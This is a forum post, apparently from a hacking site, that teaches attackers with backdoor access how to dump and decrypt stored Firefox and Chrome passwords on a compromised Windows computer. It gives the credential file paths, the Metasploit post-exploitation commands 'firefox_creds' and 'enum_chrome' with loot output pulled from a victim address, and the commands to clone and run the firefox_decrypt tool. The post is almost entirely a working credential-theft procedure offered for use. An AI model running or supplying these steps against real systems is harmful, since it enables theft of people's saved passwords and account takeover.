x32x01

ADMINISTRATOR
etrieving stored passwords in web browsers like Mozilla Firefox and Google Chrome is a part of the post-exploitation methodology. Attackers having backdoor access to a compromised computer can easily dump and decrypt stored credentials in web browsers.

How-To-Retrieve-Decrypt-Stored-Passwords-in-Firefox-Chrome-Remotely.png

Dumping Stored Mozilla Firefox Passwords

Mozilla Firefox built-in password manager stores encrypted credentials in “logins.json”. Credentials are stored in logins.json are encrypted with a key that is stored in the “key4.db” file. Both of these files are located in a certain Windows directory.
Code:
%LocalAppData%\Mozilla\Firefox\Profiles\randomString.Default\logins.json

There’s an MSF module which we’ll use to dump Firefox stored passwords on a compromised computer.

Module: firefox_creds
Code:
run post/multi/gather/firefox_creds

firefox_creds-1024x230.png

Code:
[+] Downloaded cert9.db: /root/.msf4/loot/20200927050238_default_10.10.78.147_ff.ljfn812a.cert_254315.bin
[+] Downloaded cookies.sqlite: /root/.msf4/loot/20200927050241_default_10.10.78.147_ff.ljfn812a.cook_800633.bin
[+] Downloaded key4.db: /root/.msf4/loot/20200927050253_default_10.10.78.147_ff.ljfn812a.key4_784345.bin
[+] Downloaded logins.json: /root/.msf4/loot/20200927050257_default_10.10.78.147_ff.ljfn812a.logi_176246.bin

This module has downloaded 4 files for us but you can do it download them manually.

encrypted.png

These files have been renamed to .bin just rename them to their original extension.

rename-1024x258.png

As you know the credentials are encrypted so now we have to decrypt it.

Decrypting Stored Passwords in Mozilla Firefox

Download firefox_decrypt to your local machine and run the script.
Code:
git clone https://github.com/unode/firefox_decrypt.git

There’s a manual on the GitHub repo you can follow. let’s decrypt our credential.
Code:
python firefox_decrypt.py /root/.msf4/loot

decrypt-1024x297.png

And there you go!

Dumping Stored Google Chrome Passwords

Google Chrome utilizes a Windows function called CryptProtectData which is used to encrypt passwords that are stored on a computer with the randomly generated keys. The database can be found in the below directory.
Code:
%LocalAppData%\Google\Chrome\User Data\Default\Login Data

There’s a Metasploit module available to dump stored credentials from the chrome browser.

Module: enum_chromeHow To Retrieve & Decrypt Stored Passwords in Firefox & Chrome Remotely
Code:
run post/windows/gather/enum_chrome

Decrypting Stored Passwords in Google Chrome

When using the Metasploit module to retrieve credentials it will dump .txt files containing passwords that will contain a “Decrypted Data” column to display decrypted passwords found in the chrome browser.
 
Top